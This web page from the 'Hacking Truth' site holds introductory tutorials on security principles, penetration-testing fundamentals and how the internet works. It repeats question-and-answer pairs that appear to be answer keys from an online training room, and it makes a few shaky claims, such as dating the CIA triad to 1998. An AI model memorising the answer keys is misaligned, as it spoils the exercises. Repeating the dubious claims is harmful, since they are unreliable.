
ABOUT US

Our development agency is committed to providing you with the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes exist in every major security system; you just need to understand them well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, starting with mindset and goals.

OUR SKILLS

We pride ourselves on strong, flexible and top-notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY


PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • Three Things To Know About Principles Of Security

     

     

    https://www.hackingtruth.in/



    Introduction

     

    Learn the principles of information security that secures data and protects systems from abuse

    The following room is going to outline some of the fundamental principles of information security, from the frameworks used to protect data and systems to the elements of what exactly makes data secure.

    The measures, frameworks and protocols discussed throughout this room all play a small part in "Defence in Depth."

    Defence in Depth is the use of multiple, varied layers of security across an organisation's systems and data, in the hope that these layers provide redundancy in the organisation's security perimeter.





    The CIA Triad


    The CIA triad is an information security model that is considered throughout the creation of a security policy. This model has an extensive background, with use dating back to 1998.


    This history is because the security of information (information security) does not start and/or end with cybersecurity, but instead, applies to scenarios like filing, record storage, etc.


    Consisting of three sections: Confidentiality, Integrity and Availability (CIA), this model has quickly become an industry standard today. This model should help determine the value of data that it applies to, and in turn, the attention it needs from the business.







     



    The CIA triad is unlike a traditional model where you have individual sections; instead, it is a continuous cycle. Whilst the three elements to the CIA triad can arguably overlap, if even just one element is not met, then the other two are rendered useless (similar to the fire triangle). If a security policy does not answer these three sections, it is seldom an effective security policy.


    Whilst the three elements to the CIA triad are arguably self-explanatory, let's explore these and contextualise them into cybersecurity.

     

     




    Confidentiality


    This element is the protection of data from unauthorized access and misuse. Organisations will always have some form of sensitive data stored on their systems. To provide confidentiality is to protect this data from parties that it is not intended for.


    There are many real-world examples of this: employee records and accounting documents will both be considered sensitive. Confidentiality is provided in the sense that only HR administrators will access employee records, where vetting and tight access controls are in place. Accounting records are less valuable (and therefore less sensitive), so less stringent access controls would be in place for these documents. Another example is governments using a sensitivity classification rating system (top-secret, classified, unclassified).

     

     





    Integrity


    The CIA triad element of integrity is the condition where information is kept accurate and consistent unless authorized changes are made. It is possible for the information to change because of careless access and use, errors in the information system, or unauthorized access and use. In the CIA triad, integrity is maintained when the information remains unchanged during storage, transmission, and usage not involving modification to the information. Steps must be taken to ensure data cannot be altered by unauthorised people (for example, in a breach of confidentiality).


    Many defences to ensure integrity can be put in place. Access control and rigorous authentication can help prevent authorized users from making unauthorized changes. Hash verifications and digital signatures can help ensure that transactions are authentic and that files have not been modified or corrupted.
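    As a concrete illustration of the hash verifications mentioned above, here is a minimal Python sketch. The file contents and values are made up for the example; the point is that recomputing a SHA-256 digest and comparing it against a published digest detects any modification to the data.

```python
import hashlib

def sha256_of(data: bytes) -> str:
    """Return the SHA-256 hex digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()

# The sender publishes the digest alongside the file.
original = b"quarterly accounts: revenue=1,200,000"
published_digest = sha256_of(original)

# The receiver recomputes the digest and compares.
received = b"quarterly accounts: revenue=1,200,000"
assert sha256_of(received) == published_digest  # integrity holds

# A single altered byte changes the digest entirely.
tampered = b"quarterly accounts: revenue=9,200,000"
assert sha256_of(tampered) != published_digest  # tampering detected
```

    A digital signature goes one step further: it binds the digest to a key, so the receiver can also verify who produced it, not just that the content is unchanged.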

     


     

    Availability


    In order for data to be useful, it must be available and accessible to the user.


    The main concern in the CIA triad is that the information should be available when authorised users need to access it.


    Availability is very often a key benchmark for an organisation, for example, having 99.99% uptime on their websites or systems (this is laid out in Service Level Agreements). When a system is unavailable, it often results in damage to an organisation's reputation and loss of finances. Availability is achieved through a combination of many elements, including:
     

    • Having reliable and well-tested hardware for their information technology servers (i.e. reputable servers)
       
    • Having redundant technology and services in the case of failure of the primary
       
    • Implementing well-versed security protocols to protect technology and services from attack
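    The 99.99% uptime benchmark above can be made concrete with a little arithmetic. This short Python sketch converts an SLA uptime percentage into the downtime it permits per year:

```python
# Translate an uptime percentage into the downtime it permits per year.
SECONDS_PER_YEAR = 365 * 24 * 60 * 60

def max_downtime_seconds(uptime_percent: float) -> float:
    return SECONDS_PER_YEAR * (1 - uptime_percent / 100)

# "Four nines" (99.99%) allows under an hour of downtime per year.
print(round(max_downtime_seconds(99.99) / 60, 1))   # -> 52.6 (minutes)
print(round(max_downtime_seconds(99.9) / 3600, 2))  # -> 8.76 (hours)
```

    Each extra "nine" cuts the allowed downtime by a factor of ten, which is why high-availability targets get expensive quickly.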




    1) What element of the CIA triad ensures that data cannot be altered by unauthorised people?

    Ans- Integrity



    2) What element of the CIA triad ensures that data is available?

    Ans- Availability



    3) What element of the CIA triad ensures that data is only accessed by authorised people?

    Ans- Confidentiality




    Principles of Privileges


    It is vital to administrate and correctly define the various levels of access to an information technology system individuals require.


    The levels of access given to individuals are determined by two primary factors:


    • The individual's role/function within the organisation
    • The sensitivity of the information being stored on the system

       


     


     

     

    To assign and manage the access rights of individuals, two key concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (or PAM for short).



    Initially, these two concepts can seem to overlap; however, they are different from one another. PIM is used to translate a user's role within an organisation into an access role on a system. Whereas PAM is the management of the privileges a system's access role has, amongst other things.



    What is essential when discussing privilege and access controls is the principle of least privilege. Simply put, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties.
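    The principle of least privilege can be sketched as a deny-by-default mapping from roles to permissions. The role and permission names below are hypothetical, chosen to mirror the HR and accounting example earlier:

```python
# Hypothetical role-to-permission mapping illustrating least privilege:
# each role receives only the permissions its duties require.
ROLE_PERMISSIONS = {
    "hr_admin":   {"read_employee_records", "write_employee_records"},
    "accountant": {"read_accounting_docs", "write_accounting_docs"},
    "intern":     {"read_accounting_docs"},
}

def is_allowed(role: str, permission: str) -> bool:
    """Deny by default: anything not explicitly granted is refused."""
    return permission in ROLE_PERMISSIONS.get(role, set())

assert is_allowed("hr_admin", "read_employee_records")
assert not is_allowed("intern", "write_accounting_docs")
assert not is_allowed("unknown_role", "read_accounting_docs")
```

    The deny-by-default lookup is the important design choice: a missing role or permission results in refusal, never accidental access.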


    As we previously mentioned, PAM incorporates more than assigning access. It also encompasses enforcing security policies such as password management, auditing policies and reducing the attack surface a system faces.





    1) What does the acronym "PIM" stand for?

    Ans- Privileged Identity Management



    2) What does the acronym "PAM" stand for?

    Ans- Privileged Access Management




    3) If you wanted to manage the privileges a system access role had, what methodology would you use?


    Ans- PAM




    4) If you wanted to create a system role that is based on a user's role/responsibilities within an organisation, what methodology is this?

    Ans- PIM





    Security Models Continued


    Before discussing security models further, let's recall the three elements of the CIA triad: Confidentiality, Integrity and Availability. We've previously outlined what these elements are and their importance. However, there is a formal way of achieving this.


    In the context of security models, any system or piece of technology storing information is called an information system, which is how we will reference systems and devices in this task.


    Let's explore some popular and effective security models used to achieve the three elements of the CIA triad.





    The Bell-La Padula Model


    The Bell-LaPadula Model is used to achieve confidentiality. This model has a few assumptions, such as a hierarchical structure in the organisation it is used in, where everyone's responsibilities/roles are well-defined.


    The model works by granting access to pieces of data (called objects) on a strictly need-to-know basis. This model uses the rule "no write down, no read up".
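    The "no write down, no read up" rule can be sketched in a few lines of Python. The classification levels below are illustrative assumptions, ordered from least to most sensitive; real systems use richer lattices.

```python
# Illustrative sketch of Bell-LaPadula's "no write down, no read up".
LEVELS = {"unclassified": 0, "classified": 1, "top-secret": 2}

def can_read(subject: str, obj: str) -> bool:
    # "No read up": subjects may only read objects at or below their level.
    return LEVELS[subject] >= LEVELS[obj]

def can_write(subject: str, obj: str) -> bool:
    # "No write down": subjects may only write at or above their level.
    return LEVELS[subject] <= LEVELS[obj]

assert can_read("top-secret", "classified")         # reading down: allowed
assert not can_read("classified", "top-secret")     # reading up: blocked
assert not can_write("top-secret", "unclassified")  # writing down: blocked
```

    Blocking "write down" is what stops a highly cleared user from leaking top-secret content into an unclassified document.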





     

    Advantages:
    • Policies in this model can be replicated to real-life organisations' hierarchies (and vice versa).
    • Simple to implement and understand, and has been proven to be successful.

    Disadvantages:
    • Even though a user may not have access to an object, they will know about its existence, so it is not confidential in that aspect.
    • The model relies on a large amount of trust within the organisation.

     



    The Bell-LaPadula Model is popular within organisations such as government and the military. This is because members of the organisation are presumed to have already gone through a process called vetting. Vetting is a screening process where applicants' backgrounds are examined to establish the risk they pose to the organisation. Applicants who are successfully vetted are assumed to be trustworthy, which is where this model fits in.





    Biba Model


    The Biba model is arguably the equivalent of the Bell-La Padula model but for the integrity of the CIA triad.


    This model applies the rule to objects (data) and subjects (users) that can be summarised as "no write up, no read down". This rule means that subjects can create or write content to objects at or below their level but can only read the contents of objects above the subject's level.
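    As with Bell-LaPadula, the Biba rule can be sketched in a few lines of Python. The integrity levels are illustrative labels, not from the source; note the comparisons are the mirror image of the confidentiality model.

```python
# Illustrative sketch of Biba's "no write up, no read down" rule,
# which protects integrity rather than confidentiality.
LEVELS = {"low": 0, "medium": 1, "high": 2}

def can_read(subject: str, obj: str) -> bool:
    # "No read down": only read objects at or above your integrity level.
    return LEVELS[obj] >= LEVELS[subject]

def can_write(subject: str, obj: str) -> bool:
    # "No write up": only write to objects at or below your level.
    return LEVELS[obj] <= LEVELS[subject]

assert can_read("low", "high")       # reading up is allowed
assert not can_read("high", "low")   # reading down is blocked
assert not can_write("low", "high")  # writing up is blocked
```

    Blocking "write up" is what stops low-integrity input from corrupting high-integrity data.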


    Let's compare some advantages and disadvantages of this model in the table below:
       

       


     

    Advantages:
    • This model is simple to implement.
    • Resolves the limitations of the Bell-LaPadula model by addressing both confidentiality and data integrity.

    Disadvantages:
    • There will be many levels of access and objects. Things can be easily overlooked when applying security controls.
    • Often results in delays within a business. For example, a doctor would not be able to read the notes made by a nurse in a hospital with this model.

     




    The Biba model is used in organisations or situations where integrity is more important than confidentiality. For example, in software development, developers may only have access to the code that is necessary for their job; they may not need access to critical information beyond that.
       
       



    1) What is the name of the model that uses the rule "can't read up, can read down"?

    Ans- The Bell-LaPadula Model



    2) What is the name of the model that uses the rule "can read up, can't read down"?


    Ans- The Biba Model




    3) If you were in the military, what security model would you use?

    Ans- The Bell-LaPadula Model




    4) If you were a software developer, what security model would the company perhaps use?

    Ans- The Biba Model




    Threat Modelling & Incident Response


    Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation's information technology infrastructure and services.


    A critical stage of the threat modelling process is identifying likely threats that an application or system may face, and the vulnerabilities it may be exposed to.





    The threat modelling process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:


    • Preparation
    • Identification
    • Mitigations
    • Review






    It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:


    • Threat intelligence
    • Asset identification
    • Mitigation capabilities
    • Risk assessment



     

     


     

     

     

    To help with this, there are frameworks such as STRIDE (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis); infosec never tasted so good! Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999, is still very relevant today. STRIDE includes six main principles, which are detailed below:



     

    • Spoofing: This principle requires you to authenticate requests and users accessing a system. Spoofing involves a malicious party falsely identifying itself as another. Access keys (such as API keys) or signatures via encryption help remediate this threat.
    • Tampering: By providing anti-tampering measures to a system or application, you help provide integrity to the data. Data that is accessed must be kept integral and accurate. For example, shops use seals on food products.
    • Repudiation: This principle dictates the use of services such as logging of activity for a system or application to track.
    • Information Disclosure: Applications or services that handle information of multiple users need to be appropriately configured so that only information relevant to the owner is shown.
    • Denial of Service: Applications and services use up system resources; both should have measures in place so that abuse of the application/service won't bring the whole system down.
    • Elevation of Privilege: This is the worst-case scenario for an application or service. It means that a user was able to escalate their authorization to that of a higher level, i.e. an administrator. This scenario often leads to further exploitation or information disclosure.
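    The Spoofing principle mentions access keys and signatures; one common concrete mechanism is HMAC request signing. This is a minimal sketch with a made-up secret and request body, not a production authentication scheme:

```python
import hashlib
import hmac

# Hypothetical shared API secret; in practice issued per client.
SECRET = b"example-api-secret"

def sign(message: bytes, key: bytes = SECRET) -> str:
    """Sign a request body with HMAC-SHA256 so the server can verify
    it came from a holder of the key (an anti-spoofing measure)."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(message: bytes, signature: str, key: bytes = SECRET) -> bool:
    # compare_digest avoids leaking information via timing differences.
    return hmac.compare_digest(sign(message, key), signature)

body = b'{"action": "transfer", "amount": 100}'
sig = sign(body)
assert verify(body, sig)                     # genuine request accepted
assert not verify(b'{"amount": 9999}', sig)  # forged request rejected
```

    Because the signature covers the message body, this also counters Tampering: any modification in transit invalidates the signature.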

     





    A breach of security is known as an incident. And despite all rigorous threat models and secure system designs, incidents do happen. Actions taken to resolve and remediate the threat are known as Incident Response (IR) and are a whole career path in cybersecurity.


    Incidents are classified using a rating of urgency and impact. Urgency will be determined by the type of attack faced, while the impact will be determined by the affected system and what effect that has on business operations.





     

    An incident is responded to by a Computer Security Incident Response Team (CSIRT), which is a prearranged group of employees with technical knowledge about the systems and/or current incident. To successfully resolve an incident, a set of steps, often referred to as the six phases of Incident Response, takes place, as listed below:




     

    • Preparation: Do we have the resources and plans in place to deal with the security incident?
    • Identification: Have the threat and the threat actor been correctly identified in order for us to respond?
    • Containment: Can the threat/security incident be contained to prevent other systems or users from being impacted?
    • Eradication: Remove the active threat.
    • Recovery: Perform a full review of the impacted systems to return to business-as-usual operations.
    • Lessons Learned: What can be learnt from the incident? For example, if it was due to a phishing email, employees should be trained to better detect phishing emails.

     



    1) What model outlines "Spoofing"?

    Ans- STRIDE



    2) What does the acronym "IR" stand for?

    Ans- Incident Response



    3) You are tasked with adding some measures to an application to improve the integrity of data, what STRIDE principle is this?

    Ans- Tampering



    4) An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

    Ans- Recovery





    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of this information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

     

  • Penetration Testing Fundamentals

     

     

    Penetration Testing Fundamentals




    What is Penetration Testing?


     

    Learn the important ethics and methodologies behind every pentest.
     

    Before teaching you the technical hands-on aspects of ethical hacking, you'll need to understand more about what a penetration tester's job responsibilities are and what processes are followed in performing pentests (finding vulnerabilities in a client's application or system).


    The importance and relevancy of cybersecurity are ever-increasing and can be seen in every walk of life. News headlines fill our screens, reporting yet another hack or data leak.


    Cybersecurity is relevant to everyone in the modern world, from individuals using a strong password policy to protect their emails, to businesses and other organisations needing to protect both devices and data from damage.


    A Penetration test or pentest is an ethically-driven attempt to test and analyse the security defences to protect these assets and pieces of information. A penetration test involves using the same tools, techniques, and methodologies that someone with malicious intent would use and is similar to an audit.


    According to Security Magazine, a cybersecurity industry magazine, there are over 2,200 cyber attacks every day - 1 attack every 39 seconds.
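    A quick sanity check of that figure with a couple of lines of arithmetic:

```python
# 2,200 attacks per day works out to roughly one attack every 39 seconds.
SECONDS_PER_DAY = 24 * 60 * 60
attacks_per_day = 2200
print(round(SECONDS_PER_DAY / attacks_per_day))  # -> 39
```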






    Penetration Testing Ethics

     
    The battle of legality and ethics in cybersecurity, let alone penetration testing, is always controversial. Labels like "hacking" and "hacker" often hold negative connotations, especially in pop culture, thanks to a few bad apples. The idea of legally gaining access to a computer system is a challenging concept to grasp -- after all, what makes it legal exactly?

    Recall that a penetration test is an authorised audit of a computer system's security and defences, as agreed by the owners of the systems. The legality of penetration testing is pretty clear-cut in this sense; anything that falls outside of this agreement is deemed unauthorised.

    Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.

    Companies that provide penetration testing services are held against legal frameworks and industry accreditation. For example, the National Cyber Security Centre (NCSC) has the CHECK accreditation scheme in the UK. This means that only "[CHECK] approved companies can conduct authorised penetration tests of public sector and CNI systems and networks." (NCSC).

    Ethics is the moral debate between right and wrong; where an action may be legal, it may go against an individual's belief system of right and wrong.

    Penetration testers will often be faced with potentially morally questionable decisions during a penetration test. For example, they are gaining access to a database and being presented with potentially sensitive data. Or they are, perhaps, performing a phishing attack on an employee to test an organisation's human security. If that action has been agreed upon during the initial stages, it is legal -- however ethically questionable.

    Hackers are sorted into three hats, where their ethics and motivations behind their actions determine what hat category they are placed into. Let's cover these three in the table below:

     

     

    • White Hat: These hackers are considered the "good people". They remain within the law and use their skills to benefit others. Example: a penetration tester performing an authorised engagement on a company.
    • Grey Hat: These people use their skills to benefit others often; however, they do not respect/follow the law or ethical standards at all times. Example: someone taking down a scamming site.
    • Black Hat: These people are criminals and often seek to damage organisations or gain some form of financial benefit at the cost of others. Example: ransomware authors infect devices with malicious code and hold data for ransom.

     

     

     

    Rules of Engagement (ROE)


    The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections (explained below), which are ultimately responsible for deciding how the engagement is carried out. The SANS Institute has a great example of this document, which you can view online.

     

     

     

    • Permission: This section of the document gives explicit permission for the engagement to be carried out. This permission is essential to legally protect individuals and organisations for the activities they carry out.
    • Test Scopes: This section of the document will annotate specific targets to which the engagement should apply. For example, the penetration test may only apply to certain servers or applications but not the entire network.
    • Rules: The rules section will define exactly the techniques that are permitted during the engagement. For example, the rules may specifically state that techniques such as phishing attacks are prohibited, but MITM (Man-in-the-Middle) attacks are okay.

     

     


    1) You are given permission to perform a security audit on an organisation; what type of hacker would you be?

    Ans- White Hat



    2) You attack an organisation and steal their data, what type of hacker would you be?

    Ans- Black Hat



    3) What document defines how a penetration testing engagement should be carried out?

    Ans- Rules of Engagement


     

     

    Penetration Testing Methodologies


    Penetration tests can have a wide variety of objectives and targets within scope. Because of this, no two penetration tests are the same, and there is no one-size-fits-all approach to how a penetration tester should proceed.

    The steps a penetration tester takes during an engagement are known as the methodology. A practical methodology is a smart one, where the steps taken are relevant to the situation at hand. For example, a methodology that you would use to test the security of a web application is not practical when you have to test the security of a network.


    Before discussing some different industry-standard methodologies, we should note that all of them have a general theme of the following stages:

     

     

     

    • Information Gathering: This stage involves collecting as much publicly accessible information about a target/organisation as possible, for example, OSINT and research. Note: this does not involve scanning any systems.
    • Enumeration/Scanning: This stage involves discovering applications and services running on the systems. For example, finding a web server that may be potentially vulnerable.
    • Exploitation: This stage involves leveraging vulnerabilities discovered on a system or application. This stage can involve the use of public exploits or exploiting application logic.
    • Privilege Escalation: Once you have successfully exploited a system or application (known as a foothold), this stage is the attempt to expand your access. You can escalate horizontally or vertically, where horizontal escalation is accessing another account of the same permission group (i.e. another user), and vertical escalation is accessing an account of a higher permission group (i.e. an administrator).
    • Post Exploitation: This stage involves a few sub-stages: 1. What other hosts can be targeted (pivoting)? 2. What additional information can we gather from the host now that we are a privileged user? 3. Covering your tracks. 4. Reporting.

     

     

     


    OSSTMM


    The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.


    The methodology focuses primarily on how these systems and applications communicate, so it includes a methodology for:

    • Telecommunications (phones, VoIP, etc.)
    • Wired Networks
    • Wireless communications

        

     


     

     

     

    Advantages:
    • Covers various testing strategies in-depth.
    • Includes testing strategies for specific targets (i.e. telecommunications and networking).
    • The framework is flexible depending upon the organisation's needs.
    • The framework is meant to set a standard for systems and applications, meaning that a universal methodology can be used in a penetration testing scenario.

    Disadvantages:
    • The framework is difficult to understand, very detailed, and tends to use unique definitions.

     

     

     

    OWASP


    The "Open Web Application Security Project" framework is a community-driven and frequently updated framework used solely to test the security of web applications and services.


    The foundation regularly writes reports stating the top ten security vulnerabilities a web application may have, the testing approach, and remediation.
       
        





     

    Advantages:
    • Easy to pick up and understand.
    • Actively maintained and frequently updated.
    • Covers all stages of an engagement: from testing to reporting and remediation.
    • Specialises in web applications and services.

    Disadvantages:
    • It may not be clear what type of vulnerability a web application has (they can often overlap).
    • OWASP does not make suggestions for any specific software development life cycles.
    • The framework doesn't hold any accreditation such as CHECK.

     


    NIST Cybersecurity Framework 1.1


    The NIST Cybersecurity Framework is a popular framework used to improve an organisation's cybersecurity standards and manage the risk of cyber threats. This framework is a bit of an honourable mention because of its popularity and detail.


    The framework provides guidelines on security controls & benchmarks for success for organisations from critical infrastructure (power plants, etc.) all through to commercial.  There is a limited section on a standard guideline for the methodology a penetration tester should take.


     

     


     

     

     

     

     

    Advantages:
    • The NIST Framework is estimated to be used by 50% of American organisations by 2020.
    • The framework is extremely detailed in setting standards to help organisations mitigate the threat posed by cyber threats.
    • The framework is very frequently updated.
    • NIST provides accreditation for organisations that use this framework.
    • The NIST framework is designed to be implemented alongside other frameworks.

    Disadvantages:
    • NIST has many iterations of frameworks, so it may be difficult to decide which one applies to your organisation.
    • The NIST framework has weak auditing policies, making it difficult to determine how a breach occurred.
    • The framework does not consider cloud computing, which is quickly becoming increasingly popular for organisations.

     

     

    NCSC CAF


    The Cyber Assessment Framework (CAF) is an extensive framework of fourteen principles used to assess the risk of various cyber threats and an organisation's defences against these.


    The framework applies to organisations considered to perform "vitally important services and activities" such as critical infrastructure, banking, and the likes. The framework mainly focuses on and assesses the following topics:

    •     Data security
    •     System security
    •     Identity and access control
    •     Resiliency
    •     Monitoring
    •     Response and recovery planning


     

     

     

    Advantages:
    • This framework is backed by a government cybersecurity agency.
    • This framework provides accreditation.
    • This framework covers fourteen principles which range from security to response.

    Disadvantages:
    • The framework is still new in the industry, meaning that organisations haven't had much time to make the necessary changes to be suitable for it.
    • The framework is based on principles and ideas and isn't as direct as having rules like some other frameworks.

     

     

     

    1) What stage of penetration testing involves using publicly available information?

    Ans- Information Gathering




    2) If you wanted to use a framework for pentesting telecommunications, what framework would you use? Note: We're looking for the acronym here and not the full name.

    Ans- OSSTMM



    3) What framework focuses on the testing of web applications?

    Ans- OWASP



     

     

    Black box, White box, Grey box Penetration Testing

    

    There are three primary scopes when testing an application or service. Your understanding of your target will determine the level of testing that you perform in your penetration testing engagement. In this task, we'll cover these three different scopes of testing.








    Black-Box Testing


    This testing process is a high-level process where the tester is not given any information about the inner workings of the application or service.


    The tester acts as a regular user testing the functionality and interaction of the application or piece of software. This testing can involve interacting with the interface, i.e. buttons, and testing to see whether the intended result is returned. No knowledge of programming or understanding of the programme is necessary for this type of testing.


    Black-Box testing significantly increases the amount of time spent during the information gathering and enumeration phase to understand the attack surface of the target.





    Grey-Box Testing


    This testing process is the most popular for things such as penetration testing. It is a combination of both black-box and white-box testing processes. The tester will have some limited knowledge of the internal components of the application or piece of software. Still, it will be interacting with the application as if it were a black-box scenario and then using their knowledge of the application to try and resolve issues as they find them.


    With grey-box testing, the limited knowledge given saves time, and it is often chosen for extremely well-hardened attack surfaces.






    White-Box Testing


    This testing process is a low-level process usually done by a software developer who knows programming and application logic. The tester will be testing the internal components of the application or piece of software and, for example, ensuring that specific functions work correctly and within a reasonable amount of time.


    The tester will have full knowledge of the application and its expected behaviour, which makes this approach much more time-consuming than black-box testing. The full knowledge in a white-box testing scenario provides a testing approach that guarantees the entire attack surface can be validated.

       
        


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of this information and we strongly advise against it. Please regard the word "hacking" as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • How does the internet work?

     



    How does the internet work?


    The blog post you are reading now traveled thousands of miles from a data center to reach you.


    Let's learn how the internet works by getting to understand the details of this data's incredible journey.

    The data center, which can be thousands of miles away from you, has your blog article stored inside it. How does this data reach your mobile phone or laptop?

    An easy way to achieve this goal would be with the use of satellites. From the data center, a signal could be sent to the satellite via an antenna, and then from the satellite a signal could be sent to your mobile phone via another antenna near you.


    However, this way of transmitting signals is not a good idea. Let's see why. The satellite is parked nearly 22,000 miles above the earth's equator, so in order for the data transmission to be successful, the data would have to travel a total distance of 44,000 miles. Such a long distance causes a significant delay in receiving the signal. More specifically, it causes huge latency, which is unacceptable for most internet applications. So if this article does not reach you via a satellite, how does it actually get to you?
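    The latency claim is easy to sanity-check with a quick back-of-envelope calculation, assuming the signal travels at roughly the speed of light:

    ```shell
    # One-way delay for a signal bouncing off a geostationary satellite
    # (~22,000 miles up, so ~44,000 miles travelled in total), assuming
    # the signal moves at the speed of light in vacuum.
    awk 'BEGIN {
        miles  = 44000            # up to the satellite and back down
        meters = miles * 1609.34  # miles -> meters
        c      = 299792458        # speed of light, m/s
        printf "%.2f seconds one way\n", meters / c
    }'
    # -> 0.24 seconds one way
    ```

    A full round trip (request plus response) doubles this to roughly half a second, which is why latency-sensitive internet applications avoid geostationary links.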

     

     





    Well, it is done with the help of a complicated network of optical fiber cables, which connect the data center and your device. Your phone could be connected to the internet via cellular data or a Wi-Fi router, but ultimately, at some point, your phone will be connected to this network of optical fiber cables. We saw at the beginning that the article you are currently reading is stored inside a data center. To be more specific, it is stored on a solid-state drive (SSD) within the data center. This SSD acts as the internal memory of a server. The server is simply a powerful computer whose job is to serve you the article, video or other stored content when you request it. Now the challenge is how to transfer the data stored in the data center specifically to your device via the complex network of optical fiber cables.



    Let's see how this is done. Before proceeding further, we should first understand an important concept: the IP address. Every device that is connected to the internet, whether it is a server, a computer or a mobile phone, is identified uniquely by a string of numbers known as an IP address. You can consider the IP address similar to your home address, that is, the address that uniquely identifies your home. Any letter sent to you reaches you precisely because of your home address. Similarly, in the internet world, an IP address acts as a shipping address through which all information reaches its destination. Your internet service provider (ISP) decides the IP address of your device, and you are able to see what IP address your ISP has given to your mobile phone or laptop. The server in the data center also has an IP address. The server stores a website, so you can access any website just by knowing the server's IP address. However, it is difficult for a person to remember so many IP addresses.
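    As a quick aside, on a typical Linux machine you can inspect these addresses yourself. This is a sketch that assumes a Linux host; ifconfig.me is just one of several public IP lookup services:

    ```shell
    # Local (LAN) address(es) assigned to this host:
    hostname -I

    # Public address as seen by the wider internet (requires network
    # access, so it is left commented out here):
    # curl https://ifconfig.me
    ```

    The local and public addresses usually differ because home routers perform network address translation (NAT) between your LAN and your ISP.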

    So, to solve this problem, domain names like kumaratuljaiswal.in, hackingtruth.in, udemy.com, youtube.com, facebook.com, etc. are used. These correspond to IP addresses but are easier for us to remember than a long sequence of numbers. Another thing to notice here is that a server is capable of storing several websites, and when a server hosts multiple websites, those websites cannot all be reached with the server's IP address alone.


    In such cases, additional pieces of information, host headers, are used to uniquely identify the website. However, for giant websites like facebook.com or youtube.com, an entire data center infrastructure will be dedicated to the storage of that particular website. To access the internet, we always use domain names instead of the complex IP address numbers.




    Where does the internet get the IP addresses corresponding to our domain name requests? Well, for this purpose the internet uses a huge phone book known as DNS (the Domain Name System). If you know a person's name but don't know their telephone number, you can simply look it up in a phone book.



    The DNS server provides the same service to the internet. Your internet service provider or other organizations can manage DNS servers. Let's have a recap of the whole operation. You enter the domain name, and the browser sends a request to the DNS server to get the corresponding IP address. After getting the IP address, your browser simply forwards the request to the data center, more specifically to the respective server.
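    The lookup step in this recap can be tried by hand. The sketch below assumes a Linux host: `dig` performs a real DNS query (network required, so it is commented out), while `getent` shows the same name-to-address idea using the local hosts file:

    ```shell
    # Ask a DNS server for the IP address behind a domain name
    # (requires network access; the answer can change over time):
    # dig +short hackingtruth.in

    # The same name -> address mapping exists locally in /etc/hosts,
    # which resolvers consult before DNS. "localhost" always maps to
    # the loopback address:
    getent hosts localhost
    ```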



    Once the server gets a request to access a particular website the data flow starts. The data is transferred in digital format via optical fiber cables, more specifically in the form of light pulses. These light pulses sometimes have to travel thousands of miles via the optical fiber cable to reach their destination.



    During their journey, they often have to cross tough terrain such as hilly areas or the sea floor. A few global companies lay and maintain these optical cable networks. Laying an undersea optical fiber cable is done with the help of a ship: a plow is dropped deep into the sea from the ship, and this plow creates a trench on the seabed into which it places the optical fiber cable.




    In fact, this complex optical cable network is the backbone of the Internet. These optical fiber cables carrying the light are stretched across the seabed to your doorstep where they are connected to a router. The router converts these light signals to electrical signals. An Ethernet cable is then used to transmit the electrical signals to your laptop.




    However, if you are accessing the internet using cellular data, the signal is sent from the optical cable to a cell tower, and from the cell tower the signal reaches your cell phone in the form of electromagnetic waves. Since the internet is a global network, it has become important to have an organization to manage things like IP address assignment and domain name registration. This is all managed by an institution called ICANN, located in the USA. One amazing thing about the internet is its efficiency in transmitting data when compared with cellular and landline communication technologies. The article you are reading is sent to you from the data center in the form of a huge collection of zeros and ones.



    What makes data transfer on the internet efficient is the way these zeros and ones are chopped up into small chunks known as packets and transmitted. Let's assume these streams of zeros and ones are divided into different packets by the server, where each packet consists of six bits.

     



    Along with the bits of the article, each packet also contains a sequence number and the IP addresses of the server and your phone. With this information, the packets are routed towards your phone. It's not necessary that all packets are routed through the same path; each packet independently takes the best route available at that time. Upon reaching your phone, the packets are reassembled according to their sequence numbers. If any packets fail to reach your phone, an acknowledgement is sent from your phone asking the server to resend the lost packets. Now compare this with a postal network that has a good infrastructure but whose customers do not follow the basic rules regarding destination addresses. In that scenario, letters won't be able to reach the correct destination.
